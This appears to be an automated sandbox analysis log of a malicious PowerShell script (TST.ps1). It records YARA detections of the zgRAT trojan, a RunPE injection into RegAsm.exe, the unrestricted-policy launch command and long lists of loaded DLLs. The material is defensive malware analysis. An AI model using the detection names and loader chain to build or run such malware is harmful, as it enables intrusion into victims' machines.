                      Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01454C013_2_01454C01
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01450ED83_2_01450ED8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_014538413_2_01453841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_014507ED3_2_014507ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_014508983_2_01450898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_014508A83_2_014508A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01456B483_2_01456B48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01456B583_2_01456B58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01450E7F3_2_01450E7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01450EC83_2_01450EC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01457ADF3_2_01457ADF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_01457AF03_2_01457AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_056C3F643_2_056C3F64
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_056C5F283_2_056C5F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_056C5F383_2_056C5F38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_056C5EE03_2_056C5EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05A131C03_2_05A131C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05A136E93_2_05A136E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05A71FF03_2_05A71FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05A707433_2_05A70743
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05A751703_2_05A75170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05A71FE13_2_05A71FE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05ACC7C03_2_05ACC7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: SecurityJump to behavior
                      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 0.2.powershell.exe.2c3e6fc8f00.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 0.2.powershell.exe.2c3e6fc8f00.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.troj.expl.evad.winPS1@6/10@0/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoirv3ba.02d.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: TST.ps1ReversingLabs: Detection: 18%
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: C:\Users\Administrator\Desktop\RunPe-Link\RunPE\obj\Release\RunPE.pdb source: powershell.exe, 00000000.00000002.2206077558.000002C3D70F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236665088.000002C3EF2E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347323FE push 8B485F94h; iretd 0_2_00007FFD34732403
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_056C4FE0 push esp; iretd 3_2_056C4FE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_056C48C2 push eax; retf 3_2_056C48C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_05AB3DB2 push edi; ret 3_2_05AB3DB9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
